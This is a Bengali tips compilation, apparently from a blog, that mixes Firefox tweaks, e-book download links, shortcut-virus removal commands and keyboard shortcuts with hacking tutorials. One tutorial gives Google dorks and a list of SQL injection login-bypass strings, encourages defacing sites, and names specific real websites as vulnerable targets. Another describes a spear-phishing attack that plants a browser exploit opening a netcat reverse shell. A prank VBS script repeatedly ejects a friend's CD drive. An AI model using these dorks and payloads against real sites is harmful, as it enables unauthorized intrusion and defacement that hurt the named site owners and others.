ইন্টারনেট স্পিড ৭৫% বাড়ানো সম্ভব…

1. Mozilla Firefox Open করুন।
2. Addressbar-e টাইপ করুন “about:config”
3. Message আসবে yes ক্লিক করুন।
4. এই লেখাটি খুজুন “network.http .pipelining”
এবং Value তে False থাকলে ডাবলক্লিক
করে True করুন।
5. মাউসের রাইট বাটন ক্লিক করুন > new >
Integer তে ক্লিক করুন
6. ইনপুট বক্সে টাইপ করুন
“nglayout.initi ¬alpaint.delay” OK ক্লিক
করুন, ইনপুট বক্সে টাইপ করুন “0″ এবং OK
ক্লিক করুন
7. মজিলা রিস্টাট্রাট করুন এবং উপভোগ করুন
৭৫% বেশি স্পিড!!!!

বিসিএস, ব্যাংকার্স রিক্রুটম্যান্ট, শিক্ষক নিবন্ধনসহ বিভিন্ন সরকারি ও বেসরকারি চাকরির পরীক্ষার প্রস্ততির জন্য গনিতের জ্যামিতি (Geometry)

বিসিএস, ব্যাংকার্স রিক্রুটম্যান্ট, শিক্ষক
নিবন্ধনসহ বিভিন্ন সরকারি ও বেসরকারি চাকরির
পরীক্ষার প্রস্ততির জন্য গনিতের
জ্যামিতি (Geometry) অংশের জন্য বাংলা ই-
বুক …
… এই
বইতে যা আছে
* জ্যামিতির মৌলিক ধারণা
* জায়মিতি ও পরিমিতির গুরুত্বপূর্ণ সূত্রাবলী
* ২৫০+ Geometry Question with Answer
এই বই IBA এর এমবিএ(MBA), ঢাবির ইএমবিএ
(EMBA) এবং জি আর ই(GRE) ভর্তি প্রস্তুতির
ছাড়াও যে কোন প্রতিয়োগিতামূল ক পরীক্ষার
প্রস্ততির জন্য অনেক উপকারে আসবে।
এই ই-বুকের সুবিধাঃ
————— ————-
* এই বইতে জ্যামিতির সকল ব্যাসিক
ক্যাটগরি অনুযায়ী দেওয়া আছে …
* প্রতি আধ্যায়ের শুরুতে ঐ বিষয়ক অনেক
গুলো ইউনিক সূত্র দেওয়া আছে …
ক্যাটগরী ভিত্তিক হওয়ায় সহজেই পড়তে পারবেন
ও বুঝতে পারবেন। তাছাড়া এই বইতে বুকমার্ক মেনু
ও হাইপারলিঙ্ক মেনু যুক্ত আছে আপনাকে কোন
অধ্যায়ে যেতে মাউসের চাকা ঘুরানো লাগবে জাস্ট
ওই অধ্যায়ের নামের উপর ক্লিক করলেই হবে …।
এই ই-বুক সম্পর্কে আরো বিস্তারিত জানতে …
আপনার নিজ চোখে অনলাইন লাইভ ভিউ
দেখে আসুন। তাহলেই সব বুঝতে পারবেন। তারপর
সিদ্বান্ত নিন আপনার মেগাবাইট খরচ
করে ডাউনলোড করবেন কিনা … !!!অবশ্য এই
বইয়ের মেগাবাইট খুব একটা বেশি না …
http://www.slideshare.net/tanbircox/geometry-questio n-bank-with-answer
এই লিংক থেকে আপনি চাইলে বই ডাউনলোড ও
করতে পারবেন …উপরের বারে save অপশনে ক্লিক
করে… জাস্ট ফেসবুক দিয়ে লগইন করুন দেখবেন
ডাউনলোড লিংক শো করছে
ডাউনলোড লিঙ্কঃ
Geometry Question Bank with Answer.zip
পৃষ্ঠা সংখ্যাঃ ৩০
সাইজঃ ৬ এমবি
http://www56.zippyshare.com/v/
19978730/file.html
বিসিএস গনিতের (Mathematics) প্রয়োজনীয়
সকল বাংলা ই-বুক (মোটঃ ১৫ টি pdf বই)

————— ————— —————
————— ———-
জিপ ও রার ফাইল ওপেন
কম্পিউটারের জন্যঃ
————— ————— —–
zip & rar file extract 5.0 beta 6 (x64) .exe
http://www46.zippyshare.com/v/59677769/file.html
zip & rar file extract 5.0 beta 6 (x86) 32 .exe
http://www71.zippyshare.com/v/95337306/file.html
এন্ড্রোয়েড মোবাইল
————— ————— —–
Easy Unrar Unzip .apk
http://www13.zippyshare.com/v/31274353/file.html
▬▬▬▬۩۞۩▬▬▬▬
সীমিত ইন্টারনেট প্যাকেজের ও নেটের
স্লো স্পিড়ের জন্য যারা এই ফাইল
গুলো অথাবা আমার অন্যান্য ফাইল ডাউনলোড
করতে পারছেন না …!
অথবা যারা ব্যস্তাতার জন্য ডাউনলোড করার
সময় পাচ্ছেন না……
অথবা এতগুলো ফাইল
একটা একটা করে ডাউনলোড করতে যাদের
বিরক্তিকর মনে হয় …তারা নিচের লিংকে দেখুন …
আশা করি আপনারা আপনাদের সমাধান
পেয়ে যাবেন……
https://www.facebook.com/notes/জিরো-গ্রাভিটি/complete-solution-of-your-computer-all-genuine-windows-xclusive-software-bangla-/10152049959232103

কম্পিউটার শর্টকাট ফাইল- ফোল্ডারে ভরে গেছে। বারবার ডিলিট করেও এ থেকে মুক্তি মিলছে না

কম্পিউটার শর্টকাট ফাইল-
ফোল্ডারে ভরে গেছে। বারবার ডিলিট করেও এ
থেকে মুক্তি মিলছে না। হুটহাট অনেক ফাইল-
ফোল্ডার হারিয়েও যাচ্ছে। ইদানীং এই সমস্যায়
প্রায় সবাই পড়ছেন।
আসলে এটি কোনো ভাইরাস নয়। এ হলো VBS
Script (ভিজুয়াল বেসিক স্ক্রিপ্ট)। এ
যন্ত্রণা থেকে খুব সহজেই মুক্তি পেতে পারেন।
নিচের ধাপগুলো অনুসরণ করুন।
CMD ব্যবহার করে
১. ওপেন CMD (Command Prompt – DOS)
২. নিচের কমান্ডটি হুবহু লিখুন
attrib -h -s -r -a /s /d Name_drive:*.*
এবার Name_drive
লেখাটিতে যে ড্রাইভটি আপনি শর্টকাট
ভাইরাসমুক্ত করতে চান সেটি লিখুন। যেমন: C
ড্রাইভ ভাইরাসমুক্ত করতে চাইলে লিখুন attrib -h
-s -r -a /s /d c:*.*
৩. এন্টার বাটন চাপুন
৪. এবার দেখবেন শর্টকাট ভাইরাস ফাইল ও
ফোল্ডারগুলো স্বাভাবিক হয়ে যাবে। এবার ওই
ফাইল ও ফোল্ডারগুলো ডিলিট করে দিন।
→ .bat ব্যবহার করে Bat ফাইল
হলো নোটপ্যাডে লেখা একটি একজেকিউটেবল
ফাইল। এতে ডাবল ক্লিক করলেই চালু হয়ে যায়।
১. নোটপ্যাড ওপেন করুন।
২. নিচের কোডটি হুবহু কপি-পেস্ট করুন
@echo off attrib -h -s -r -a /s /d
Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
attrib -h -s -r -a /s /d Name_Drive:*.*
@echo complete.
৩. এবার Name_Drive এর জায়গায় ভাইরাস
আক্রান্ত ড্রাইভের নাম লিখুন। যদি তিনটির
বেশি ড্রাইভ আক্রান্ত হয় তাহলে কমান্ডটি শুধু
কপি-পেস্ট করলেই চলবে।
৪. removevirus.bat এই নাম দিয়ে ফাইলটি সেভ
করুন।
৫. এবার ফাইলটি বন্ধ করে ডাবল ক্লিক করে রান
করুন।
৬. এবার দেখবেন আপনার শর্টকাট ভাইরাস ফাইল-
ফোল্ডার গুলো সব স্বাভাবিক হয়ে গেছে। এখন
সব ডিলিট করে দিন।
এছাড়া নিচের কৌশলও নিতে পারেন আক্রান্ত
পেনড্রাইভ থেকে বাঁচতে
১. RUN এ যান।
২. wscript.exe লিখে ENTER চাপুন।
৩. Stop script after specified number of
seconds: এ 1 দিয়ে APPLY করুন।
এবার কারো পেনড্রাইভের শর্টকাট ভাইরাস আর
আপনার কম্পিউটারে ডুকবে না। আক্রান্ত
কম্পিউটার ভাইরাসমুক্ত করতে
১. কী বোর্ডের CTRL+SHIFT+ESC চাপুন।
২. PROCESS ট্যাবে যান।
৩. এখানে wscript.exe ফাইলটি সিলেক্ট করুন।
৪. End Process এ ক্লিক করুন।
৫. এবার আপনার কম্পিউটারের C:/ ড্রাইভে যান।
৬. সার্চ বক্সে wscript লিখে সার্চ করুন।
৭. wscript নামের সব ফাইলগুলো SHIFT+DELETE
দিন।
৮. যেই ফাইলগুলো ডিলিট
হচ্ছে না ওইগুলো স্কিপ করে দিন।
৯. এখন RUN এ যান।
১০. wscript.exe লিখে ENTER চাপুন।
১১. Stop script after specified number of
seconds: এ 1 দিয়ে APPLY করুন।
ব্যাস, আপনার কম্পিউটার শর্টকাট ভাইরাসমুক্ত।
এবার পেনড্রাইভের শর্টকাট ভাইরাসও আর
আপনার কম্পিউটারে ডুকবে না।

DVD/CD Drive door নিয়ে একটু মশকরা করি

ধরুন বন্ধুর পিসির সামনে বসে আছেন ,
আসে পাশে বন্ধুকেউ দেখছেন না … এই
ফাকে চলেন পিসির DVD/CD Drive door
নিয়ে একটু মশকরা করি
প্রথমে কম্পিউটারে নোটপ্যাড খুলুন ।এরপর
নিচের লেখাগুলো
কপিকরে পেস্ট করুন।
Set oWMP = CreateObject (“WMPlayer.OCX.
7″) Set colCDROMs = oWMP.cdromColle ction
do if colCDROMs.Count >=
1 then For i = 0 to colCDROMs.Count – 1
colCDROMs.Item( i).
Eject Next For i = 0 to
colCDROMs.Count – 1
colCDROMs.Item( i).
Eject Next End If wscript.sleep 5000 loop
এবার নোটপ্যাড ফাইলটি “Moskora.vbs”
নামে ডেস্কটপে সেভ করুন।
এবার ডেস্কটপে এসে moskora.vbs ফাইলটির
ওপর ডাবল ক্লিক করুন। দেখবেন এক মিনিট পর
পর
কম্পিউটারে ডিভিডি ড্রাইভটি আপনা আপনি খুলছে আবার
বন্ধ হচ্ছে।
এই ভুয়া মশকরা ভাইরাস নিয়ে মজা করা শেষ
হলে ডেস্কটপ থেকে moskora.vbs নামের
ফাইলটি ডিলিট করে কম্পিউটার রিস্টার্ট দিন।
ডিভিডি ড্রাইভ আগের
মতই ঠিক হয়ে যাবে।
( এটা কোনো ক্ষতিই করবে না )
FaceBOOK

ড. জাকির নায়েক এর বই “প্রধান ধর্ম সমুহে স্রষ্টার ধারণা”

ড. জাকির নায়েক এর লিখিত “প্রধান ধর্ম
সমুহে স্রষ্টার ধারণা” (Concept of God in
major religion) একটি অসাধারন বই
Concept of God in major religion “প্রধান
ধর্ম সমুহে স্রষ্টার ধারণা” ডাউনলোড
করে নিন । বইটি ড. জাকির নায়েক এর
একটি জনপ্রিয় বই। বাংলায় অনুবাদ করা বই
। বইটি তে হিন্দু, মুসলিম, খ্রীস্টানে,
ইয়াহুদি ধর্মে স্রষ্টা সম্পর্কে যে ধারণা করা হয়েছে তা নিয়ে বিস্তারিত
বর্ননা করা হয়েছে। ড. জাকির নায়েক
যিনি সকল ধর্ম সম্পর্কে ভাল জ্ঞানের
অধিকারি । তিনি ধর্ম তত্ত্বের উপর এক জন
বিশেজ্ঞ। অসাধারন একটি বই আসা করব
বইটি সকলের ভাল লাগবে।
Author: জাকির নায়েক (Zakir nayek)
Book Category : ইসলামিক (islam)
Format: PDF (পিডিএফ)
Language: বাংলা (Bangoli)
File Size: 1.9 MB
ডাউনলোড করুন Download
বইটির সাইজ মাত্র 1.9 MB সংগ্রহ
করে পড়তে পারেন BTtutorial

হুমায়ুন আজাদ এর কিছু বই

মূলতঃ গবেষক ও প্রাবন্ধিক হলেও হুমায়ূন
আজাদ ১৯৯০-এর দশকে একজন
প্রতিভাবান ঔপন্যাসিক
হিসাবে আত্মপ্রকাশ করেন। ২০০৪
খৃস্টাব্দে মৃত্যু অবধি তাঁর প্রকাশিত
উপন্যাসের সংখ্যা ১৩। তাঁর ভাষা দৃঢ়,
কাহিনীর গঠন সংহতিপূর্ণ এবং রাজনৈতিক
দর্শন স্বতঃস্ফূর্ত।
তবে কাহিনীতে যৌনতার ব্যবহার
কখনো কখনো মাত্রাতিরিক্ত
বা অপ্রয়োজনীয়
হয়েছে বলে তিনি সমালোচিত হয়েছেন। শেষ
দিককার কয়েকটি উপন্যাসে তাঁর
দৃষ্টিভঙ্গি মূলতঃ রাজনৈতিক রচনার
শিল্পরূপকে ক্ষুণ্ণ করেছে বলে প্রতীয়মান
হয়।
মূলত ১৯৯৪ সালে তিনি ঔপন্যাসিক
হিসেবে নিজেকে আত্মপ্রকাশ করেন
প্রথম উপন্যাস ছাপ্পান্নো হাজার
বর্গমাইলের মধ্যে দিয়ে। ১৯৯৫
সালে প্রকাশিত হয় সব কিছু ভেঙ্গে পড়ে।
আর এই বইয়ের জন্য
তিনি বাংলা একাডেমীর পুরস্কার পেয়েছেন।
২০০২ সালে ১০০০০ এবং আরও
একটি ধর্ষণ, ২০০৩ সালে একটি খুনের
স্বপ্ন এবং ২০০৪ সালে প্রকাশিত পাক
সার জমিন সাদ বাদ-এর
মতো একটি অসাধারণ নতুন মাত্রার
উপন্যাস।
http://www.mediafire.com/?3rb8dw752rh71fu
http://www.mediafire.com/?v8j6dujhj6pp46k
http://www.mediafire.com/?4cu16eucosp1fbv
http://www.mediafire.com/?8ualb6u5ubh1r4v
http://www.mediafire.com/?tm7624sxrwft9qc
http://www.mediafire.com/?1sagoyg11ad74ba
http://www.mediafire.com/?1xsb1pu8k1dmajk
হুমায়ুন আজাদ স্যার কে নিয়ে আর ও কিছু
বই
১>হুমায়ুন আজাদের মুখোমুখি
http://www.4shared.com/office/6TAFeu0Z/Humayun_Azad-er_Mukhomukhi.html
২>হুমায়ুন আজাদের সৃতি ও সাক্ষাৎকার
http://www.4shared.com/office/TPJY8j5r/Humayun_Azader_Smriti_O_Sakkha.html
৩>তোমার গল্প উৎসর্গ হুমায়ুন আজাদ
কে
http://www.4shared.com/office/UYhIf8e0/Tomar_Golpo_Utsorgo_Ghatokahot.html
৪>কণ্ঠ আমার রুদ্ধ আজিকে
http://www.4shared.com/office/6xmv6VrX/Kontho_Amar_Ruddho_Aajike__Hum.html
৫>শেষ সাক্ষাৎকার
http://www.4shared.com/office/9gdy5RcX/Dr_Ahmad_Sharif-er_Shesh_Sakkh.html
৬>আক্রমণ একটি অধিকারের উপর
http://www.mediafire.com/?maq81k3b49a4vay
7>হুমায়ুন আজাদের কবিতা
http://www.4shared.com/office/GX-83SRa/humayun_azader_kobita.html

windows Keyboard Shortcuts

CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
Delete (Delete)
Shift+Delete (Delete the selected
item permanently without
placing the item in the Recycle
Bin)
CTRL while dragging an item
(Copy the selected item)
CTRL+Shift while dragging an
item (Create a shortcut to the
selected item)
F2 key (Rename the selected
item)
CTRL+RIGHT ARROW (Move the
insertion point to the beginning
of the next word)
CTRL+LEFT ARROW (Move the
insertion point to the beginning
of the previous word)
CTRL+DOWN ARROW (Move the
insertion point to the beginning
of the next paragraph)
CTRL+UP ARROW (Move the
insertion point to the beginning
of the previous paragraph)
CTRL+Shift with any of the
arrow keys (Highlight a block of
text)
Shift with any of the arrow keys
(Select more than one item in a
window or on the desktop, or
select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a
folder)
Alt+Enter (View the properties
for the selected item)
Alt+F4 (Close the active item, or
quit the active program)
Alt+Enter (Display the properties
of the selected object)
Alt+Spacebar (Open the
shortcut menu for the active
window)
CTRL+F4 (Close the active
document in programs that
enable you to have multiple
documents open
simultaneously)
Alt+Tab (Switch between the
open items)
Alt+ESC (Cycle through items in
the order that they had been
opened)
F6 key (Cycle through the screen
elements in a window or on the
desktop)
F4 key (Display the Address bar
list in My Computer or Windows
Explorer)
Shift+F10 (Display the shortcut
menu for the selected item)
Alt+Spacebar (Display the
System menu for the active
window)
CTRL+ESC (Display the Start
menu)
Alt+Underlined letter in a menu
name (Display the
corresponding menu)
Underlined letter in a command
name on an open menu
(Perform the corresponding
command)
F10 key (Activate the menu bar
in the active program)
RIGHT ARROW (Open the next
menu to the right, or open a
submenu)
LEFT ARROW (Open the next
menu to the left, or close a
submenu)
F5 key (Update the active
window)
Backspace (View the folder one
level up in My Computer or
Windows Explorer)
ESC (Cancel the current task)
Shift when you insert a CD-ROM
into the CD-ROM drive (Prevent
the CD-ROM from automatically
playing)
Dialog Box Keyboard Shortcuts
CTRL+Tab (Move forward
through the tabs)
CTRL+Shift+Tab (Move
backward through the tabs)
Tab (Move forward through the
options)
Shift+Tab (Move backward
through the options)
Alt+Underlined letter (Perform
the corresponding command or
select the corresponding
option)
Enter (Perform the command
for the active option or button)
Spacebar (Select or clear the
check box if the active option is
a check box)
Arrow keys (Select a button if
the active option is a group of
option buttons)
F1 key (Display Help)
F4 key (Display the items in the
active list)
Backspace (Open a folder one
level up if a folder is selected in
the Save As or Open dialog box)
Microsoft Natural Keyboard
Shortcuts
Win (Display or hide the Start
menu)
Win+BREAK (Display the System
Properties dialog box)
Win+D (Display the desktop)
Win+M (Minimize all of the
windows)
Win+Shift+M (Restore the
minimized windows)
Win+E (Open My Computer)
Win+F (Search for a file or a
folder)
CTRL+Win+F (Search for
computers)
Win+F1 (Display Windows Help)
Win+ L (Lock the keyboard)
Win+R (Open the Run dialog
box)
Win+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right Shift for eight seconds
(Switch FilterKeys either on or
off)
Left Alt+left Shift+PRINT
SCREEN (Switch High Contrast
either on or off)
Left Alt+left Shift+NUM
LOCK (Switch the MouseKeys
either on or off)
Shift five times (Switch the
StickyKeys either on or off)
NUM LOCK for five seconds
(Switch the ToggleKeys either
on or off)
Win +U (Open Utility Manager)
Windows Explorer Keyboard
Shortcuts
END (Display the bottom of the
active window)
HOME (Display the top of the
active window)
NUM LOCK+* (Display all of the
subfolders that are under the
selected folder)
NUM LOCK++ (Display the
contents of the selected folder)
NUM LOCK+- (Collapse the
selected folder)
LEFT ARROW (Collapse the
current selection if it is
expanded, or select the parent
folder)
RIGHT ARROW (Display the
current selection if it is
collapsed, or select the first
subfolder)
Shortcut Keys For Character Map
After you double-click a
character on the grid of
characters, you can move
through the grid by using the
keyboard shortcuts:
RIGHT ARROW (Move to the right
or to the beginning of the next
line)
LEFT ARROW (Move to the left or
to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one
row)
PAGE UP (Move up one screen at
a time)
PAGE DOWN (Move down one
screen at a time)
HOME (Move to the beginning of
the line)
END (Move to the end of the
line)
CTRL+HOME (Move to the first
character)
CTRL+END (Move to the last
character)
Spacebar (Switch between
Enlarged and Nor mal mode
when a character is selected)
Microsoft Management Console
(MMC) Main Window Keyboard
Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a
console item)
CTRL+W (Open a new window)
F5 key (Update the content of all
console windows)
Alt+Spacebar (Display the MMC
window menu)
Alt+F4 (Close the console)
Alt+A (Display the Action menu)
Alt+V (Display the View menu)
Alt+F (Display the File menu)
Alt+O (Display the Favorites
menu)
MMC Console Window Keyboard
Shortcuts
CTRL+P (Print the current page
or active pane)
Alt+- (Display the window menu
for the active console window)
Shift+F10 (Display the Action
shortcut menu for the selected
item)
F1 key (Open the Help topic, if
any, for the selected item)
F5 key (Update the content of all
console windows)
CTRL+F10 (Maximize the active
console window)
CTRL+F5 (Restore the active
console window)
Alt+Enter (Display the Properties
dialog box, if any, for the
selected item)
F2 key (Rename the selected
item)
CTRL+F4 (Close the active
console window. When a
console has only one console
window, this shortcut closes
the console)
Remote Desktop Connection
Navigation
CTRL+Alt+END (Open the m*cro
$oft Windows NT Security dialog
box)
Alt+PAGE UP (Switch between
programs from left to right)
Alt+PAGE DOWN (Switch
between programs from right
to left)
Alt+INSERT (Cycle through the
programs in most recently used
order)
Alt+HOME (Display the Start
menu)
CTRL+Alt+BREAK (Switch the
client computer between a
window and a full screen)
Alt+Delete (Display the Windows
menu)
CTRL+Alt+- (Place a snapshot of
the active window in the client
on the Terminal server
clipboard and provide the same
functionality as pressing PRINT
SCREEN on a local computer.)
CTRL+Alt++ (Place a snapshot of
the entire client window area
on the Terminal server
clipboard and provide the same
functionality as pressing Alt
+PRINT SCREEN on a local
computer.)
Internet Explorer Navigation
CTRL+B (Open the Organize
Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog
box)
CTRL+N (Start another instance
of the browser with the same
Web address)
CTRL+O (Open the Open dialog
box, the same as CTRL+L)
CTRL+P (Open the Print dialog
box)
CTRL+R (Update the current
Web page)
CTRL+W (Close the current
window)

hacking -BTtutorial

সহজ
হ্যাকিং শিখবো , তবে এই পদ্ধতিতে কিনতু
হ্যাক্সর আহমেদ এর চটিকন্ঠের
মতো কোনো সাইট র্টাগেট করে হ্যাক
করা যাইপে না ।
এই কাজটি আমরা authentication bypass
পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।
হ্যাকিং শুরু করুনঃ
১।প্রথমে আমরা যাবো google.কম এ।
২।এবার Search বক্সে নিচের যে কোন
একটি Google dork/sql injection লিখুন।
আপনাদের সুবিধার্থে আমি sql injection কিছু
দিয়ে দিলাম নিচে।
“inurl:admin.as p”
“inurl:login/ admin.asp”
“inurl:admin/ login.asp”
“inurl:adminlog in.asp”
“inurl:adminhom e.asp”
“inurl:admin_lo gin.asp”
“inurl:administ ratorlogin.asp”
“inurl:login/ administrator.as p”
“inurl:administ rator_login.asp ”
“inurl: admin.php”
“inurl: login/ admin.php”
“inurl: admin/ login.php”
“inurl: adminlogin.php”
“inurl: adminhome.php”
“inurl: admin_login.php ”
“inurl: administratorlo gin.php”
“inurl: login/ administrator.ph p”
“inurl: administrator_l ogin.php”
এবার সার্চ দিন। তাহলে অনেক
গুলো ফলাফল পাবেন।
যে কোনো একটি সাইটে প্রবেশ করুন।
তাহলে সাইটটি আপনাকে নিচের
মতো কিছু দেখাবে…
“welcome to xxxxxxxxxx administrator
panel”
username :
password :
এখানে ইউজার নেম দিনঃ Admin
তাহলে পাসওয়ার্ড কি দিবেন ? নিচের
থেকে যে কোন একটি দিন।
নিচে কিছু sql injections পাস দিলাম। এখান
থেকে যে কোন একটি দিনঃ
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:’or’1′ =’1
এবার submit এ ক্লিক করুন। ব্যস কাজ শেষ
আপনি এখন ঐ সাইট এর এডমিন।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়।
তাই যেকোনো সাইটে লিখতে পারবেন
না “hacked by ছুক্কু মিয়া ” যে সব সাইট
vulnerable সেগুলোতে লিখতে পারবেন।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট
করে আপনাকে গুগল এ খুজতে না হয় ।
তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
sunmarytrust .org/adm inlogin.asp
arcvns .com/admin.asp
amskrupajal .org/Admi nLogin.asp
quickwrench .com/Adm in/ adminlogin.asp
adyar .net/ Adminlogin. asp
ringjordan .com/Admin Login.asp
preventivecardi ology .i n/ adminlogin.asp
udesa .co.za/admin /login.asp
railgourmet .com/admi n/ admin-login.asp
(লিংক গুলোতে আমি কিছু স্পেস দিয়েছি ,
আপনারা সেগুলো রিমুভ করে ব্রাউজারে পেষ্ট
করূন) গুগল এ খুজলে আপনি হাজার হাজার
vulnerable সাইট পাবেন ।
এটা তো দুধ ভাত হ্যাকিং , যেগুলা আমার
মতো যেকোনো “হকারই” পারবো ! আসল
হ্যাকিং শিখতে বড় ভাইয়ের
ঠ্যাং ধইরা কান্দাকাটি করন লাগবো

ইনফর্মেশন গেদারিং টেকনিক বা তথ্য সংগ্রহ -BTtutorial

আজকে আমরা সাধারন ইনফর্মেশন
গেদারিং টেকনিক বা তথ্য সংগ্রহ বিষয় এ
জানবো। হ্যাকিং আক্রমণ এর
সবচাইতে বেশী গুরুত্ত পূর্ণ ইনফর্মেশন
গেদারিং বা তথ্য সংগ্রহ ।এই বিষয় টাই
পরে আমাদের কোন টার্গেট কে আক্রমণ এর
প্রথম ধাপ হিসাব এ কাজ্জ করবে ।
যত বেশী তথ্য সংগ্রহ
করা যাবে ততো বেশী সফলতা অর্জন এর
সম্ভাবনা থাকে ।
১। সম্পূর্ণ বিষয় আলোচনা করার পর
আমরা বুজতে পারব কি ভাবে বিভিন্ন কৌশল ও
অনলাইন সম্পদ ব্যাবহার করে আমরা কোন
বিশেষ টার্গেট এর জনসাধারন এর জন্য যে সব
তথ্য অনলাইন এ দেওয়া আছে তা সংগ্রহ
করতে পারি । আমরা এখানে গুগলি(google),
নেটক্রাফ (Netcraft) এবং হুইস(Whois) এর মত
সার্ভিস ও টুলস গুল ব্যাবহার করব ।
২। ইনফর্মেশন গেদারিং টেকনিক বা তথ্য
সংগ্রহ অংশটাই আপনাকে নতুন নতুন
গুগলি হ্যাক (google hack) ও তার ব্যাবহার
সম্পর্কে পারদর্শী করে তুলবে ।
উদাহারন দিলাম এখানে মূল বিষয় টা পরিষ্কার
করে না রাখলেই নয় ঃ
ধরুন আমি একটা পেনটেস্টিং এর কাজ
করছি আমাকে যে টার্গেট দেওয়া হোল
তাতে অ্যাটাক করার মত তেমন কোন ভাল সুজুগ
পাওয়া যাচ্ছিলো না । যে কয়েকটা অপশন ছিল
অ্যাটাক করার টা ও খুব ভাল ভাবে সিকিউর করা।
এমতা অবস্থায় যে হেতু যে কোন ভাবেই হোক
আমাকে মেশিন টাকে নিয়ন্ত্রন এ নিতে হবে ।
সেই অবস্থায় আমাকে বিশেষ ভাবে ভিন্ন পথ
বেছে নিতে হবে প্রথম এ ।
আমি গুগলি করে কোম্পানির একজন
কর্মকর্তার ইমেইল সহ বিভিন্ন তথ্য সংগ্রহ
করে ফেলি এবং যাচাই বাছাই
করে আমি বুজতে পারি তার কোন বিষয় খুব
বেশী আগ্রহ এবং সে অই বিষয় এর
সাথে সম্পৃক্ত বিভিন্ন ব্লগ ও ফোরাম এর
সদস্য ।
তখন আমি ভিন্ন নাম এ তার পিছু পিছু সেই সব
ব্লগ ও ফোরাম এর সদস্য হয়ে গেলাম ।
এবং তার সাথে পার্সোনাল ম্যাসেজ এ সেই
বিষয় এর উপর একটা তথ্য দিলাম । স্বভাবতই
তার জন্য আগে থেকে তৈরি করা নো-
আইপি ডোমেইন এ একটা ডোমেইন রেজিস্টার
করে তার যেই বিষয় টার প্রতি আগ্রহ
সেটা ভিডিও,ছবি বা অন্যকিছুর সাথে চলতি সময়
এর বিশেষ কোন ব্রাউজার এর এক্সপ্লইট
কোড যোগ করে অই
ডেমো সাইটা টা তৈরি করে রাখি । যখন
সে আমার কথার উপর ভিত্তি করে এবং আগ্রহ
নিয়ে আমার তৈরি করা ওয়েবসাইট এ
যাবে এবং শেখান থেকে কিছু ডাউনলোড করুক
বা না করুক আমার মেলেসিয়াস কোড
স্বয়ং ক্রিয় ভাবে টার কম্পিউটার এ
ডাউনলোড হবে এবং স্বয়ংক্রিয় ভাবে নেটকেট
এ রিভার্স সেল আমাকে পাঠাবে । এর পরের
ঘটনা বুজতেই পারছেন ।
এইটা একটা সাধারন উদাহারন যে কি ভাবে তথ্য
সংগ্রহ বা ইনফর্মেশন গেদারিং বা তথ্য
সংগ্রহ ই আপনার কাঙ্ক্ষিত
সফলতা এনে দিতে পারে । এই রকম
হাজারো পদ্দতি আমরা ব্যাবহার করতে পারি।
আমার বেক্তি গত মতামত একজন ভিকটিম এর
মন পঠন (mind reading) টার বিভিন্ন অনলাইন
কার্যাবলী কে বিচার বিশ্লেষণ
করে সম্ভাবনা যাচাই বাছাই এর
মাধ্যমে বুঝে নেওয়া সম্ভব তার আগ্রহ
টা কোথায় আর এইটা তখনি সম্ভব যখন
আপনার কাছে পর্যাপ্ত তথ্য থাকে ।

হ্যাকিং শিক্ষার জন্য কিছু জিজ্ঞাসা-BTtutorial

প্রত্যেক দিন ফেসবুক এ অনেক এর
সাথে কথা হয় কেউ পরিচিত কেউ বা অপরিচিত ।
বিভিন্ন বয়স আর বিভিন্ন পেশার মানুষ এর
সাথে । সবার একটাই অনূরোধ থাকে বা আক্ষেপ
থাকে বা প্রশ্ন থাকে – ” ভাই আমি হ্যাকার
হতে চাই কি ভাবে হবো ?
আপনি কি আমাকে শিখাবেন ?
বা আমি শিখবো রাস্তা টা দেখান । কেউ
তোঁ শিখাতে চায় না । ”
আরও অনেক অনেক প্রশ্নর সম্মুখীন হতে হয়
আমাকে । আসলে আমি নিজে হ্যাকার নই
তবে হ্যাকার দের সাথে মিশার সুজুগ হওয়ায় খুব
কাছে থেকে তাদের স্বভাব,চিন্তা ধারা,তাদের
কাজ করার কৌশল অনেক কিছুর সাথে পরিচিত ।
সেই সুবাধে অনেক সময় টুক টাক তাদের
আওড়ান কথা অন্নকে বলি ।
যদি আপনি গুগলি তে সার্চ করেন how can i
become a professional hacker ?
তাহলে আপনি About 7,540,000 results (0.34
seconds) ফলাফল আপনার চোখের
সামনে দেখতে পারবেন ।
হ্যাঁ সবার মত আমিও
বলছি হ্যাকিং যদি শিখতে হয়
তাহলে গুগলি হচ্ছে আপনার পাঠশালা । এই
গুগলিই আপনাকে দিতে পারে হ্যাকিং জগত এ
প্রবেশ এর সঠিক রাস্তার ঠিকানা । তাই সবার
আগে যা প্রয়োজন টা হোল এই গুগলিকে ১০০
ভাগ সঠিক ভাবে ব্যাবহার করে আপনি আপনার
কাঙ্ক্ষিত হ্যাকিং জগত এর সন্ধান লাভ
করতে পারেন। গুগলির ব্যাবহার
নিয়ে আমরা আজকে আলোচনা করবো না ।
গুগলি এমন এক বিষয় যেটা নিয়ে একটা লিখায়
কিছুই বুঝানো সম্ভব নয় তাই
আমরা ফিরে যাচ্ছি আমাদের মুল আলোচনায় ।
একজন হ্যাকার হতে হলে কিছু বিশেষ বেপার
আপনাকে লক্ষ রাখতে হবে
১। হ্যাকিং এর আগপাছ সম্পর্কে জানুন ।
